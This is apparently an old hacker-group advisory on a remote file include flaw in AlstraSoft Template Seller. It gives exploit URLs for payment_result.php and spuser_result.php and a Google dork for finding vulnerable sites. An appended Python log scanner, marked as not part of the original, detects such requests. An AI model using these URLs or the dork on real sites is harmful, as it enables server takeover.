
AlstraSoft Template Seller Remote File Include Vulnerability



SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability



#############################SolpotCrew Community################################
#
#        AlstraSoft Template Seller Remote File Include Vulnerability
#
# Download file : http://www.alstrasoft.com/template.htm
#
#################################################################################
#
#
#       Bug Found By : NoGe a.k.a da_jackass
#
# contact: jong_amq@hotmail.com
#
# Website : http://nyubicrew.org/adv/Noge_adv_01.txt
#
################################################################################
#
#
#      Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
#              yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
#              #papmahackerlink #nyubi #maluku-hacker #papuahacker
#
###############################################################################
# Vulnerability found in

payment_result.php and spuser_result.php

line 6 include("$config[template_path]/onlyheader.php");
line 7 include("$config[template_path]/onlysearch.php");


# Exploit

/payment/payment_result.php?config[template_path]=[evilcode]

/payment/spuser_result.php?config[template_path]=[evilcode]


# google dork

"Powered by AlstraSoft Template Seller"

######################################E.O.F##################################
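
Added example, not part of the original advisory: a Python check over web server access logs that flags requests supplying `config[template_path]` to the two scripts named above, including percent-encoded forms of the parameter name and value. The log lines, addresses, and the `classify` and `scan` names are constructed for illustration, and a combined-format access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts the advisory names as containing the include() calls.
AFFECTED = ("payment_result.php", "spuser_result.php")
PARAM = "config[template_path]"
# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with scheme:// or // points include() outside the local tree.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//', re.I)

# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] '
    '"GET /payment/payment_result.php?order=15 HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2007:10:02:11 +0000] '
    '"GET /payment/spuser_result.php?config%5Btemplate_path%5D='
    'http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 734',
    '192.0.2.44 - - [01/Jan/2007:10:02:15 +0000] '
    '"GET /payment/payment_result.php?config[template_path]=templates/blue '
    'HTTP/1.0" 200 901',
    '192.0.2.7 - - [01/Jan/2007:10:05:00 +0000] '
    '"GET /index.php?config[template_path]=http://example.invalid/x '
    'HTTP/1.1" 404 0',
]


def classify(line):
    """Return None, 'override' or 'remote-include' for one access log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(AFFECTED):
        return None
    # parse_qsl percent-decodes names and values, so config%5Btemplate_path%5D
    # and an encoded URL value are compared in their decoded form.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM:
            return "remote-include" if REMOTE_RE.match(value.strip()) else "override"
    return None


def scan(lines):
    """Return (1-based line number, verdict) for every flagged log line."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, verdict) for n, verdict in hits if verdict]


if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

Any hit is worth review, since the template path is a server-side setting that a client request has no reason to supply.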
